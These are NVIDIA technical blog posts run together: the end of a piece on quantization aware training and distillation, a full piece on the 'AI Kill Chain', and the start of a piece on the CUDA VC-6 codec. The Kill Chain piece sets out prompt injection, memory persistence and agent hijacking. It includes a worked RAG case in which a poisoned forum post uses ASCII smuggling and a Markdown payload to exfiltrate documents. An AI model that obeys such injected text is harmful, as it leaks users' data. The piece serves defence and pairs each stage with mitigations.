train(model, train_loader, optimizer, scheduler, ...)

For optimal results, we suggest running QAT for a duration equivalent to about 10% of the initial training epochs. In the context of LLMs, we’ve observed that QAT fine-tuning for even less than 1% of the original pre-training time is often sufficient to restore the model’s quality. To dive deeper into QAT, we recommend exploring the complete Jupyter notebook walkthrough.

What is Quantization Aware Distillation?

Similar to QAT, QAD aims to recover accuracy after post-training quantization, but it simultaneously performs knowledge distillation. Unlike standard knowledge distillation, where a larger “teacher” model guides a smaller “student” model, the student in QAD is simply leveraging fake quantization during the forward pass. The teacher model is the original higher precision model that has already been trained on the same data. The distillation process aligns the quantized student’s outputs with the full-precision teacher’s outputs, using a distillation loss to measure how far the quantized predictions deviate (Figure 4 below).

Flowchart of Quantization Aware Distillation (QAD). On the left, an original precision model is combined with calibration data and a quantization recipe to create a QAD-ready student model. This student model is paired with a higher precision teacher model and a subset of the original training data. In the QAD training loop, the student uses “fake quantization” weights in its forward pass, while the teacher performs a standard forward pass. Outputs are compared to calculate QAD loss, which combines distillation loss with standard training loss. Gradients flow back through the student model using a straight-through estimator (STE), and the student’s high-precision weights are updated to adapt to quantization conditions.Flowchart of Quantization Aware Distillation (QAD). On the left, an original precision model is combined with calibration data and a quantization recipe to create a QAD-ready student model. This student model is paired with a higher precision teacher model and a subset of the original training data. In the QAD training loop, the student uses “fake quantization” weights in its forward pass, while the teacher performs a standard forward pass. Outputs are compared to calculate QAD loss, which combines distillation loss with standard training loss. Gradients flow back through the student model using a straight-through estimator (STE), and the student’s high-precision weights are updated to adapt to quantization conditions.
Figure 4. QAD trains a low-precision student model under teacher guidance, combining distillation loss with standard QAT updates.

The student’s computations are fake quantized during the distillation process while the teacher remains at full precision. Any mismatch introduced by quantization is directly exposed to the distillation loss, allowing the low-precision weights and activations to adjust toward the teacher’s behavior (Figure 5 below). After QAD, the resulting model runs with the same inference performance as PTQ and QAT (since precision and the architecture are unchanged), but the accuracy recovery can be higher, thanks to the additional learning provided by the distillation loss. 

Diagram of the gradient and loss flow in Quantization Aware Distillation (QAD). On the left, a loss landscape curve illustrates gradient descent, with a note that high precision math is used for gradient computation and weight accumulation. In the center, a neural network represents the student model: original precision weights are updated under quantization conditions. A green arrow labeled “Straight Through Estimator” carries gradients backward. On the right, the student’s outputs are compared to the teacher’s outputs to calculate distillation loss, which is combined with standard QAT loss to form the overall QAD loss.Diagram of the gradient and loss flow in Quantization Aware Distillation (QAD). On the left, a loss landscape curve illustrates gradient descent, with a note that high precision math is used for gradient computation and weight accumulation. In the center, a neural network represents the student model: original precision weights are updated under quantization conditions. A green arrow labeled “Straight Through Estimator” carries gradients backward. On the right, the student’s outputs are compared to the teacher’s outputs to calculate distillation loss, which is combined with standard QAT loss to form the overall QAD loss.
Figure 5. QAD loss combines distillation loss from the teacher with QAT loss, updating student weights through STE under quantization conditions.

In practice, this approach is more effective than distilling a FP32 model and then quantizing it, since the QAD process is better able to take into account the quantization error and adjust the model directly to account for it.

How to apply QAD with Model Optimizer

TensorRT Model Optimizer currently provides experimental APIs for applying this technique. Starting with a process similar to QAT and PTQ, the quantization recipe must first be applied to the student model. After that, the distillation configuration can be defined, specifying elements such as the teacher model, training arguments, and the distillation loss function. The QAD APIs will undergo improvements to simplify the application of this technique. To track the latest code examples and documentation, explore the QAD section of the Model Optimizer repository. 

Evaluating the Impact of QAT and QAD

Not all models require QAT or QAD—many retain over 99.5% of their original accuracy across key benchmarks with just PTQ. 

In some cases, like that of Llama Nemotron Super, we observe significant benefits from QAD. Figure 6 below compares this model’s baseline BF16 scores across benchmarks such as GPQA Diamond, LIVECODEBENCH, Math-500, and AIME 2024 to the checkpoints after PTQ and QAD. With the exception of LIVECODEBENCH, all other benchmarks recover at least 4-22% accuracy leveraging QAD.

Bar chart comparing model evaluation accuracy across quantization techniques for the “Super Llama Nemotron Reasoning” model. The chart measures accuracy for four benchmarks: GPQA Diamond, LIVECODEBENCH, Math-500, and AIME 2024. For GPQA Diamond, BF16 baseline scores 0.64, PTQ 0.60, and QAD 0.64. LIVECODEBENCH shows equal accuracy of 0.28 for BF16, PTQ, QAT, and QAD. On Math-500, BF16 baseline achieves 0.96, PTQ 0.90, QAT 0.96, and QAD 0.96. For AIME 2024, BF16 baseline scores 0.58, PTQ 0.36, QAT 0.58, and QAD 0.58. Overall, QAD consistently matches BF16 accuracy while PTQ lags behind in some benchmarks.Bar chart comparing model evaluation accuracy across quantization techniques for the “Super Llama Nemotron Reasoning” model. The chart measures accuracy for four benchmarks: GPQA Diamond, LIVECODEBENCH, Math-500, and AIME 2024. For GPQA Diamond, BF16 baseline scores 0.64, PTQ 0.60, and QAD 0.64. LIVECODEBENCH shows equal accuracy of 0.28 for BF16, PTQ, QAT, and QAD. On Math-500, BF16 baseline achieves 0.96, PTQ 0.90, QAT 0.96, and QAD 0.96. For AIME 2024, BF16 baseline scores 0.58, PTQ 0.36, QAT 0.58, and QAD 0.58. Overall, QAD consistently matches BF16 accuracy while PTQ lags behind in some benchmarks.
Figure 6. QAD preserves baseline accuracy across benchmarks, using Super Llama Nemotron Reasoning, outperforming PTQ in tasks like Math-500 and AIME 2024. QAT accuracy was not measured for this model, but can be expected to score between PTQ and QAD.

In practice, the success of QAT and QAD depends heavily on the quality of the training data, the chosen hyperparameters, and the model architecture. When quantizing down to 4-bit data types, formats like NVFP4 benefit from more granular and higher-precision scaling factors. 

Figure 7 below shows accuracy for Llama-Nemotron Nano across common VLM benchmarks for both NVFP4 and MXFP4. Across benchmarks like AI2D, ChartQA, and DocVQA, we see NVFP4 consistently scoring higher by less than 1%. Though small, these small differences can lead to observable impact in real-world tasks. On the OpenVLM Hugging Face Leaderboard, the performance gap between the top model and lower-ranked models on a given benchmark is often just a few points.

ar chart titled “Llama-Nemotron Nano VLM – Model Evaluation Accuracy MXFP4 and NVFP4 (Higher is Better).” The x axis is Model Evaluation with five tasks: AI2D, ChartQA, InfoVQA, OCRBench, and DocVQA. The y axis is Accuracy. Each task shows two bars: light gray labeled MXFP4 QAD and green labeled NVFP4 QAD. Numeric labels above bars read approximately: AI2D 98.58 and 98.70, ChartQA 98.84 and 98.96, InfoVQA 95.60 and 99.07, OCRBench 99.88 and 100.00, DocVQA 99.56 and 99.89. NVFP4 QAD bars are equal to or higher than MXFP4 QAD across all tasks, with the largest gap on InfoVQA.ar chart titled “Llama-Nemotron Nano VLM – Model Evaluation Accuracy MXFP4 and NVFP4 (Higher is Better).” The x axis is Model Evaluation with five tasks: AI2D, ChartQA, InfoVQA, OCRBench, and DocVQA. The y axis is Accuracy. Each task shows two bars: light gray labeled MXFP4 QAD and green labeled NVFP4 QAD. Numeric labels above bars read approximately: AI2D 98.58 and 98.70, ChartQA 98.84 and 98.96, InfoVQA 95.60 and 99.07, OCRBench 99.88 and 100.00, DocVQA 99.56 and 99.89. NVFP4 QAD bars are equal to or higher than MXFP4 QAD across all tasks, with the largest gap on InfoVQA.
Figure 7. Comparison of QAD 4-bit precision model evaluation accuracy for NVFP4 and MXFP4 formats relative to the original precision.

A larger gap is observed between visual question answering (VQA) like InfoVQA and DocVQA. InfoVQA and DocVQA both ask questions about images, but they stress different things during inference. InfoVQA’s dataset is composed of busy charts and complex graphics with tiny numbers, thin lines, and nuanced annotations. When the model is quantized to 4 bits, we risk rounding away the model’s ability to detect those small details. NVFP4 helps here because it uses finer-grained scaling (smaller blocks and higher-precision scale factors), which better preserves both small signals and occasional outliers—yielding steadier alignment between the visual and text components of the model (less rounding/clipping error).

DocVQA, by contrast, is mostly clean, structured documents (forms, invoices, receipts) where once the right field is found, the answer is obvious—so both formats are already near the ceiling, and the gap stays small.

Summary

Quantization aware training (QAT) and quantization aware distillation (QAD) extend the benefits of PTQ by teaching models to adapt directly to low-precision environments, recovering accuracy where simple calibration falls short. As shown in benchmarks like Math-500 and AIME 2024, these techniques can close the gap between low-precision inference and full-precision baselines, giving developers the best of both worlds: the efficiency of FP4 execution and the robustness of high-precision training. Considerations must be made for dataset selection and training hyperparameters as these can have a significant impact on the result of this technique. 

With TensorRT Model Optimizer, these advanced workflows are accessible through familiar PyTorch and Hugging Face APIs, making it easy to experiment with formats such as NVFP4 and MXFP4. Whether you need the speed of PTQ, the resilience of QAT, or the accuracy gains of QAD, you have a complete toolkit to compress, fine-tune, and deploy models on NVIDIA GPUs. The result is faster, smaller, and more accurate AI—ready for production at scale. 

To explore further, check-out our Jupyter notebook tutorials.

[ad_2]

How Quantization Aware Training Enables Low-Precision Accuracy Recovery

Modeling Attacks on AI-Powered Apps with the AI Kill Chain Framework

[ad_1]

AI-powered applications are introducing new attack surfaces that traditional security models don’t fully capture, especially as these agentic systems gain autonomy. The guiding principle for the evolving attack surface is clear: Assume prompt injection. But turning that into effective defenses is rarely straightforward.

The Cyber Kill Chain security framework defines how attackers operate. At NVIDIA, we built the AI Kill Chain to show how adversaries compromise AI applications and demonstrate where defenders can break the chain. Unlike models that highlight attackers using AI, this framework focuses on attacks against AI systems themselves.

In this blog, we’ll outline the stages, show examples, and connect it to other security models.

Diagram of the AI Kill Chain showing five stages: recon, poison, hijack, persist, and impact, with an iterate/pivot loop connecting persist back to poison to show attack cycles in agentic systems.Diagram of the AI Kill Chain showing five stages: recon, poison, hijack, persist, and impact, with an iterate/pivot loop connecting persist back to poison to show attack cycles in agentic systems.
Figure 1. NVIDIA AI Kill Chain: stages of an attack on AI-powered applications

Our AI Kill chain consists of five stages—recon, poison, hijack, persist, and impact—with an iterate/pivot branch. In the next sections, we’ll dive deeper into each stage of the AI Kill Chain, as shown above in Figure 1. 

What happens during the recon stage of the AI Kill Chain? 

In the recon stage, the attacker maps the system to plan their attack. Key questions an attacker is asking at this point include:

  • What are the routes by which data I control can get into the AI model? 
  • What tools, Model Context Protocol (MCP) servers, or other functions does the application use that might be exploitable?
  • What open source libraries does the application use?
  • Where are system guardrails applied, and how do they work?
  • What kinds of system memory does the application use?

Recon is often interactive. Attackers will probe the system to observe errors and behavior. The more observability they gain into the system’s behavior, the more precise their next steps become.

Defensive priorities to break recon: 

  1. Access control: Limit system access to authorized users.
  2. Minimize information: Sanitize error messages, scrub system prompts, guardrail disclosures and component identifiers from outputs.
  3. Monitor for probing behaviors: Implement telemetry to detect unusual inputs or access patterns indicative of recon.
  4. Harden models: Fine-tune models to resist transfer attacks and sensitive information elicitation.

Disrupting recon early prevents attackers from gaining the knowledge they need to execute precise attacks later in the Kill Chain.

How do attackers poison AI systems in this stage?

In the poison stage, the attacker’s goal is to place malicious inputs into locations where they will ultimately be processed by the AI model. Two primary techniques dominate:

  • Direct prompt injection: The attacker is the user, and provides inputs via normal user interactions. Impact is typically scoped to the attacker’s session but is useful for probing behaviors.
  • Indirect prompt injection: The attacker poisons data that the application ingests on behalf of other users (e.g., RAG databases, shared documents). This is where impact scales.

Text-based prompt infection is the most common technique. However, there are others such as:

  • Training data poisoning: Injecting tainted data into datasets used for fine-tuning or training models.
  • Adversarial example attacks: Bit-level manipulation of inputs (images, audio, etc.) to force misclassification.
  • Visual payloads: Malicious symbols, stickers, or hidden data that influence model outputs in physical contexts (e.g., autonomous vehicles).

Defensive priorities to break poison:

  • Sanitize all data: Don’t assume internal pipelines are safe, and apply guardrails to user inputs, RAG sources, plugin data, and API feeds.
  • Rephrase inputs: Transform content before ingestion to disrupt attacker-crafted payloads.
  • Control data ingestion: Sanitize any publicly writable data sources before ingestion.
  • Monitor ingestion: Watch for unexpected data spikes, anomalous embeddings, or high-frequency contributions to ingestion pipelines.

How do attackers hijack AI model behavior once poisoning succeeds?

The hijack stage is where the attack becomes active. Malicious inputs, successfully placed in the poison stage, are ingested by the model, hijacking its output to serve attacker objectives. Common hijack patterns include:

  • Attacker-controlled tool use: Forcing the model to call specific tools with attacker-defined parameters.
  • Data exfiltration: Encoding sensitive data from the model’s context into outputs (e.g., URLs, CSS, file writes).
  • Misinformation generation: Crafting responses that are deliberately false or misleading.
  • Context-specific payloads: Triggering malicious behavior only in targeted user contexts.

In agentic workflows, hijack becomes even more powerful. The elevated autonomy given to the LLM means that attackers can manipulate the model’s goals, not just outputs, steering it to execute unauthorized actions autonomously.  

Defensive priorities to break hijack:

  • Segregate trusted vs. untrusted data: Avoid processing  attacker-controlled and sensitive data in the same model context.
  • Harden model robustness: Use adversarial training, robust RAG, techniques such as CaMeL, or instruction hierarchy techniques to train models to resist injection patterns.
  • Validate tool calls contextually: Ensure every tool invocation aligns with the original user request.
  • Implement output-layer guardrails: Inspect model outputs for intent, safety, and downstream impact before use.

Hijack is the critical point where an attacker gains functional control. Breaking the chain here protects downstream systems, even if poisoning wasn’t fully prevented.

How do attackers persist their influence across sessions and systems?

Persistence allows attackers to turn a single hijack into ongoing control. By embedding malicious payloads into persistent storage, attackers ensure their influence survives within and across user sessions. Persistence paths depend on the application’s design:

  • Session history persistence: In many apps, injected prompts remain active within the live session.
  • Cross-session memory: In systems with user-specific memories, attackers can embed payloads that survive across sessions.
  • Shared resource poisoning: Attackers target shared databases (e.g., RAG sources, knowledge bases) to impact multiple users.
  • Agentic plan persistence: In autonomous agents, attackers hijack the agent’s goals, ensuring continued pursuit of attacker-defined goals.

Persistence enables attackers to repeatedly exploit hijacked states, increasing the likelihood of downstream impact. In agentic systems, persistent payloads can evolve into autonomous attacker-controlled workflows.

Defensive priorities to break persist:

  • Sanitize before persisting: Apply guardrails to all data before sending to session history, memory, or shared resources.
  • Provide user-visible memory controls: Let users see, manage, and delete their stored memories.
  • Contextual memory recall: Ensure memories are retrieved only when relevant to the current user’s request.
  • Enforce data lineage and auditability: Track data throughout its lifecycle to enable rapid remediation.
  • Control write operations: Require human approval or stronger sanitization for any data writes that could impact shared system state.

Persistence allows attackers to escalate from a single point-in-time attack to continuous presence in an AI powered application, potentially impacting multiple sessions.

How do attackers iterate or pivot to expand their control in agentic systems?

For simple applications, a single hijack might be the end of the attack path. But in agentic systems, where AI models plan, decide, and act autonomously, attackers exploit a feedback loop: iterate and pivot. Once an attacker successfully hijacks model behavior, they can:

  • Pivot laterally: Poison additional data sources to affect other users or workflows, scaling persistence.
  • Iterate on plans: In fully agentic systems attackers can rewrite the agent’s goals, replacing them with attacker-defined ones.
  • Establish command and control (C2): Embed payloads that instruct the agent to fetch new attacker-controlled directives on each iteration.

This loop transforms a single point of compromise into systemic exploitation. Each iteration reinforces the attacker’s position and impact, making the system progressively harder to secure.

Defensive priorities to break iterate/pivot:

  • Restrict tool access: Limit which tools, APIs, or data sources an agent can interact with, especially in untrusted contexts.
  • Validate agent plans continuously: Implement guardrails that ensure agent actions stay aligned with the original user intent.
  • Segregate untrusted data persistently: Prevent untrusted inputs from influencing trusted contexts or actions, even across iterations.
  • Monitor for anomalous agent behaviors: Detect when agents deviate from expected task flows, escalate privileges, or access unusual resources.
  • Apply human-in-the-loop on pivots: Require manual validation for actions that change the agent’s operational scope or resource access.

Iterate/pivot is how attackers influence compounds in agentic systems. Breaking this loop is essential to prevent small hijacks from escalating into large-scale compromise.

What kinds of impacts do attackers achieve through compromised AI systems?

Impact is where the attacker’s objectives materialize by forcing hijacked model outputs to trigger actions that affect systems, data, or users beyond the model itself.

In AI-powered applications, impact happens when outputs are connected to tools, APIs, or workflows that execute actions in the real world:

  • State-changing actions: Modifying files, databases, or system configurations.
  • Financial transactions: Approving payments, initiating transfers, or altering financial records.
  • Data exfiltration: Encoding sensitive data into outputs that leave the system (e.g., via URLs, CSS tricks, or API calls).
  • External communications: Sending emails, messages, or commands impersonating trusted users.

The AI model itself often cannot cause impact; its outputs do. Security must extend beyond the model to control how outputs are used downstream.

Defensive priorities to break impact:

  • Classify sensitive actions: Identify which tool calls, APIs, or actions have the ability to change external state or expose data.
  • Wrap sensitive actions with guardrails: Enforce human-in-the-loop approvals or automated policy checks before execution.
  • Design for least privilege: Tools should be narrowly scoped to minimize misuse, avoid multifunction APIs that broaden attack surface.
  • Sanitize outputs: Strip payloads that can trigger unintended actions (e.g., scripts, file paths, untrusted URLs).
  • Use Content Security Policies (CSP): Prevent frontend-based exfiltration methods, like loading malicious URLs or inline CSS attacks.

Robust downstream controls on tool invocation and data flows can often contain attacker reach.

How can the AI Kill Chain be applied to a real-world AI system example?

In this section, we’ll use the AI Kill Chain to analyze a simple RAG application and how it might be used to exfiltrate data. We’ll show how we can improve its security by attempting to interrupt the AI Kill Chain at each step.

Architecture diagram of a simple Retrieval-Augmented Generation (RAG) application. Shows how user queries pass through embedding, reranking, and LLM components connected to a vector database. Highlights how attackers can poison data sources, hijack outputs, and trigger exfiltration as the RAG pipeline processes inputs.Architecture diagram of a simple Retrieval-Augmented Generation (RAG) application. Shows how user queries pass through embedding, reranking, and LLM components connected to a vector database. Highlights how attackers can poison data sources, hijack outputs, and trigger exfiltration as the RAG pipeline processes inputs.
Figure 2. Architecture diagram of a simple RAG application

An attacker’s journey through the AI Kill Chain might look something like this:

  • Recon: The attacker sees that three models are used: embedding, reranking, and an LLM. They examine open source documentation for known vulnerabilities, as well as user-facing system documentation to see what information is stored in the vector database. Through interaction with the system, they attempt to profile model behavior and elicit errors from the system, hoping to gain more information about the underlying software stack. They also experiment with various forms of content injection, looking for observable impact.
    • The attacker discovers documentation that suggests that valuable information is contained in the vector database, but locked behind access control. Their testing reveals that developer forum comments are also collected by the application, and that the web frontend is vulnerable to inline style modifications, which may permit data exfiltration. Finally, they discover that ASCII smuggling is possible in the system, indicating that those characters are not sanitized and can affect the LLM behavior.
  • Poisoning: Armed with the knowledge from the recon step, the attacker crafts a forum post, hoping it will be ingested into the vector database. Within the post they embed, via ASCII smuggling, a prompt injection containing a Markdown data exfiltration payload. This post is later retrieved by an ingestion worker and inserted into the vector database.
    • Mitigations: Publicly writable data sources such as public forums should be sanitized before ingestion. Introducing guardrails or prompt injection detection tools like NeMoGuard-JailbreakDetect as part of the filtering step can help complicate prompt injection through these sources. Adding filtering of ASCII smuggling characters can make it more difficult to inject hidden prompt injections, raising the likelihood of detection.
  • Hijack: When a different user asks a question related to the topic of the attackers forum post, that post is returned by the vector database and—along with the hidden prompt injection—is included in the augmented prompt sent to the LLM. The model executes the prompt injection and is hijacked: All related documents are encoded and prepared for exfiltration via Markdown.
    • Mitigations: Segregate trusted and untrusted data during processing. Had the untrusted forum data been processed separately from the internal (trusted) data in two separate LLM calls, then the LLM would not have had the trusted internal data to encode when hijacked by the prompt injection in the internal data. Rephrasing or summarization for each of the inputs might also have resulted in a higher level of difficulty in getting a prompt injection to operate.
  • Persist: In this case, persistence is automatic. As long as the poisoned data is retained in the vector database, additional queries will be able to trigger it.
    • Mitigations: Data segregation here, combined with careful audit logging of included sources, could reduce the blast radius of the attack, and allow for detection and removal of the tainted data.
  • Impact: When the LLM response, containing LLM-generated data exfiltration payload, is loaded by the victim’s browser in the RAG application frontend, it triggers a request to an attacker-controlled server. At this point, the data is exfiltrated and the attack (in this interaction) is complete.
    • Mitigations: Removing any URLs from the LLM produced output prevents many exfiltration attacks in this class. Content segregation (above) would prevent anything but untrusted data from being exfiltrated. Finally, strong content security policies on the front end can block requests to untrusted domains, while also blocking exfiltration

Because this application is only a “Level 1” agent with a deterministic process flow, the iterate/pivot step is not exercised.

Conclusion

Securing AI requires understanding how AI changes the attack surface, and building layered defenses that scale with autonomy levels. As enterprises deploy LLMs, RAG systems, and agentic workflows, attackers are actively evolving their methods to exploit these AI-driven systems. 

The AI Kill Chain provides a clear, actionable way to break down how these attacks unfold—stage by stage. It helps teams move beyond generalized “prompt injection” concerns to see where, how, and why attackers can escalate their control. At NVIDIA, we operationalize many of these defenses through technologies like NeMo Guardrails, Jailbreak Detection NIMs, and architectural best practices. 

Learn more about best practices for securing LLM-enabled applications, the framework for understanding agentic autonomy levels and security, and our NVIDIA AI red team. 

[ad_2]

Modeling Attacks on AI-Powered Apps with the AI Kill Chain Framework

Build High-Performance Vision AI Pipelines with NVIDIA CUDA-Accelerated VC-6

[ad_1]

The constantly increasing compute throughput of NVIDIA GPUs presents a new opportunity for optimizing vision AI workloads: keeping the hardware fed with data. As GPU performance continues to scale, traditional data pipeline stages, such as I/O from storage, host-to-device data transfers (PCIe), and CPU-bound processing like decoding and resizing, don’t always keep pace. This disparity can create a bottleneck where the accelerator is left waiting for data, a challenge often called GPU starvation. Closing this data-to-tensor gap requires a smarter data pipeline designed to align with modern, high-performance hardware.

This post introduces the NVIDIA CUDA-accelerated implementation of SMPTE VC-6 (ST 2117-1), a codec architected for massively parallel computation. We explore how VC-6’s native features, like hierarchical, multi-resolution and selective decoding and fetching, are a natural fit for the parallel architecture of GPUs. By directly mapping the codec’s inherent parallelism to a GPU’s architecture, we can build a more efficient path from compressed bits to model-ready tensors. We’ll cover the performance gains of moving from CPU and OpenCL to a CUDA implementation, demonstrating how this approach helps with accelerated decode that can easily be consumed by demanding AI applications.

What is VC-6?

SMPTE VC-6 is an international standard for image and video coding designed from the ground up for direct, efficient interaction with modern compute architectures, particularly GPUs. Instead of encoding an image as a single, flat block of pixels, VC-6 generates an efficient multi-resolution hierarchy. Figure 1 shows an example; demonstrating powers-of-two downscaling between resolutions (8K, 4K, Full HD).

Figure 1 shows an example; demonstrating powers-of-two downscaling between resolutions (8K, 4K, Full HD).Figure 1 shows an example; demonstrating powers-of-two downscaling between resolutions (8K, 4K, Full HD).
Figure 1.VC-6 hierarchical reconstruction

The encoding process works as follows:

  1. The source image is recursively downsampled to create multiple layers, called echelons, each representing a different level of quality (LoQ).
  2. The smallest echelon serves as the low-resolution, i.e., root LoQ, and is encoded directly.
  3.  The encoder then reconstructs upwards. For each higher level, it upsamples the lower-resolution version and subtracts it from the original to capture the difference, or residuals.
  4. The final bitstream contains the root LoQ followed by these successive residual layers.
Figure 2 shows the pipeline for VC-6 encoderFigure 2 shows the pipeline for VC-6 encoder
Figure 2. VC-6 encoder pipeline

The VC-6 decoder can reverse the process successively through every LoQ. This is done by starting with the root LoQ, upsampling to the next LoQ, and adding the corresponding residuals, until the target resolution/LoQ is reached. Crucially, every component, whether it’s a color plane, an echelon, or a specific image tile, can be accessed and decoded independently and in parallel.  This structure allows developers to:

  • Transfer only the bytes that matter, reducing I/O, bandwidth, memory use, and memory accesses while maximizing throughput.
  • Decode only what’s needed, at any LoQ, producing tensors closer to the model’s required input size without a full decode and resize.
  • Access specific regions of interest (RoI) within each LoQ instead of processing the entire frame, saving significant computation,

The following table summarizes the architectural benefits of VC-6:

Feature SMPTE VC-6 (ST 2117)
Core architecture Hierarchical, S-Tree Predictive, Parallel.
Selective data recall Native support. The bitstream structure allows for fetching only the bytes required for a partial request.
Selective resolution (LoQ) decode Native support. Intrinsic to the hierarchical LoQ structure, produce surface near target size without full decode + resize.
RoI decode Native support. Intrinsic to the navigable S-tree structure, pull just the tiles that matter for the model stage.
Parallel decode capability Massively parallel. Plane/LoQ/tiled residuals independence enables fine‑grained GPU parallelism.
Max bit depth Up to 31 bits per component.
Multi-plane support Native, up to 255 planes (e.g., RGB, alpha, depth).
Table 1.VC-6 capabilities for AI

As the table highlights, VC-6’s native support for selective resolution, RoI decoding, and especially selective data recall makes it suited for AI pipelines where efficiency and targeted data access are paramount.

I/O reduction with partial data recall

Beyond decode speed, VC-6’s ability to selectively recall data dramatically reduces I/O. Traditional codecs typically require reading the entire file, even for lower-resolution outputs. With VC-6, you only fetch the bytes needed for the target LoQ, RoI, or plane (i.e., color space). For CPU decoding, the benefit is fewer bytes from the network or storage to RAM. For GPU decoding, this also holds with the addition of reduced PCIe memory bandwidth and VRAM usage.

As illustrated in Figure 3, on the first 100 images of the DIV2K dataset (where one dimension is equal to 2,040 pixels and the other varies), we observed:

  • LoQ1 (medium-resolution,1,020 pixels) transfers ~63% of the total file bytes.
  • LoQ2 (low-resolution, 510 pixels) transfers ~27%.
Figure 3 is a bar chat representing I/O savingsFigure 3 is a bar chat representing I/O savings
Figure 3. Average file size required to decode different LoQ, 3 bpp example

That translates to I/O savings of ~37% and ~72% respectively, versus full‑resolution, proportionally reducing network, storage, PCIe, and memory traffic. You can subsequently fetch the remaining layers (or only the tiles for a small RoI) without reprocessing the entire file. For data loaders, this is an immediate way to lift throughput or increase batch sizes without changing model code.

Mapping VC-6 to GPU: a natural fit for parallelism

The architecture of VC-6 aligns well with the GPU’s single instruction, multiple thread (SIMT) execution model. Its design intentionally minimizes inter-dependencies to facilitate massive parallelism.

  • Component independence: Image data is partitioned into tiles, planes, and echelons that can be processed independently. VC-6 encodes the information needed for independent tile decoding in a way that enables parallel processing of hundreds of thousands of tiles with minimal impact on compression efficiency.
  • Simple, local operations: Unlike codecs using block-based DCT or wavelets, VC-6’s core pixel transforms operate on small, independent 2×2 pixel neighborhoods, which simplifies GPU kernel design.
  • Memory efficiency: The entropy coding is designed to be inherently massively parallel, and lookups have a very low memory footprint, with tables small enough to fit into shared memory or even registers, making the process highly suitable for SIMT execution.

Although the term hierarchy may suggest serial processing, VC-6 has minimized the inter-dependency by incorporating two hierarchies that operate in largely orthogonal dimensions, offering a unique structure for concurrent processing. 

This architectural parallelism, originally used for low-latency, random-access video editing workflows in the CPU and OpenCL versions, is also a perfect match for the high-throughput demands of AI.

AI training pipelines are designed to maximize throughput, where a framework like the PyTorch DataLoader spawns parallel processes to hide latency. Much like advanced editing systems, these AI workflows require fast, on-demand access to different resolutions and regions of an image. The opportunity to apply these features to accelerate AI workloads was the primary driver for creating a dedicated CUDA implementation. A native CUDA library enables targeted optimizations that maximize throughput, fully leveraging VC-6’s architectural strengths for the AI ecosystem.

VC-6 Python library with CUDA acceleration

V-Nova and NVIDIA collaborated to optimize VC-6 for the CUDA platform, recognizing that it’s the de facto standard in the AI ecosystem. Porting VC-6 from OpenCL ensures seamless integration with tools like PyTorch and the broader AI pipeline without additional CPU copies or synchronization points.

Moving VC-6 to CUDA provides several key advantages:

  • Minimizes overhead: It avoids the expensive context-switching overhead between AI workloads and the OpenCL implementation.
  • Enhances interoperability: It provides direct integration with the CUDA Tensor ecosystem. CUDA streams enable memory exchange without the need for CPU synchronization.
  • Unlocks advanced profiling: It enables the use of powerful tools like NVIDIA Nsight Systems and NVIDIA Nsight Compute to identify and address performance bottlenecks.
  • GPU hardware intrinsics: With CUDA it’ll be possible to use all available hardware intrinsics on NVIDIA GPUs.

The current VC-6 CUDA path is in alpha, with native batching and further optimizations on the roadmap, which are enabled through CUDA and are motivated by new AI requirements. Even at this stage, the performance gains over OpenCL and the CPU implementation are already significant, providing a strong foundation on which further development and improvements will continue to build.

Installation and usage

The VC-6 Python package is distributed as a pre-compiled Python wheel, enabling straightforward installation through pip. Following this, you can create VC-6 codec objects and start encoding, decoding, and transcoding. An example of how to encode and decode VC-6 bitstream follows (visit our GitHub repo for more complete samples):

from vnova.vc6_cuda12 import codec as vc6codec    # for CUDA
# from vnova.vc6_opencl import codec as vc6codec     # for OpenCL
# from vnova.vc6_metal import codec as vc6codec      # for Metal 
# setup encoder and decoder instances
encoder = vc6codec.EncoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,                  vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CPU) 
encoder.set_generic_preset(vc6codec.EncoderGenericPreset.LOSSLESS) 
decoder = vc6codec.DecoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,  vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CPU)  	  

encoded_image = encoder.read("example_1920x1080_rgb8.rgb")           
decoder.write(encoded_image.memoryview, "recon_example_1920x1080_rgb8.rgb")

GPU memory output

In the case of the CUDA package (vc6_cuda12), the decoder output can yield a CUDA array interface. To enable this feature, create the decoder by specifying GPU_DEVICE as the output memory type. With that, the output images will have __cuda_array_interface__ and can be used with other libraries like CuPy, PyTorch, and nvImageCodec.

from vnova.vc6_cuda12 import codec as vc6codec # for CUDA only
import cupy # setup GPU decoder instances with CUDA device output
decoder = vc6codec.DecoderSync(1920, 1080, vc6codec.CodecBackendType.CPU,    vc6codec.PictureFormat.RGB_8, vc6codec.ImageMemoryType.CUDA_DEVICE) 
# decode from file
decoded_image = decoder.read("example_1920x1080_rgb8.vc6") 
# Make a cupy array from decoded image, download to cpu and write to file
cuarray = cupy.asarray(decoded_image) 
with open("reconstruction_example_1920x1080_rgb8.rgb") as 
    decoded_file.write(cuarray.get(), 
"reconstruction_example_1920x1080_rgb8.rgb")

For sync and async decoders, accessing __cuda_array_interface__ is blocking and implicitly waits for the result to be ready in the image.

The __cuda_array_interface__ always contains one-dimensional data of unsigned 8-bit type, like the CPU version. Adjusting dimensions (or the type in case of 10-bit formats) is up to the user.

Partial decode and IO operations

To perform a partial decoding, decoder functions accept an optional parameter that describes the region of interest. In the following example, the decoder will only read and process the data required for decoding the quarter-resolution image.

# Read and decode quarter resolution (echelon 1) FrameRegion can also be used to describe a target rectangle
decoded_image = decoder.read("example_1920x1080_rgb8.vc6", vc6codec.FrameRegion(echelon=1)

Partial data recall is also possible with the other decode functions that operate on memory rather than file paths. For that purpose, a utility function is exposed on the VC6 library to separately peek at the file header and report the required size for the target LoQ. The exact usage is shown in the GitHub samples.

Performance benchmarks: CPU compared to OpenCL and CUDA

We evaluated VC‑6 on an NVIDIA RTX PRO 6000 Blackwell Server-Edition using the DIV2K dataset (800 images), measuring per‑image decode time across CPU, OpenCL (GPU), and CUDA implementations for different LoQs. For batched tests, we used a “pseudo-batch” approach, which simulates native batching by running multiple asynchronous single-image decoders in parallel to maximize throughput. The same harness is usable to reproduce results, which are illustrated in Figure 4.

Figure 4 shows a benchmark of the VC-6 comparison of per-image decode time in milliseconds  Figure 4 shows a benchmark of the VC-6 comparison of per-image decode time in milliseconds
Figure 4.VC-6 decoding performance across implementations

The move to CUDA shows a clear performance uplift.

  • For single-image decoding, CUDA is up to 13x faster than the CPU (1.24 ms vs. 15.95 ms).
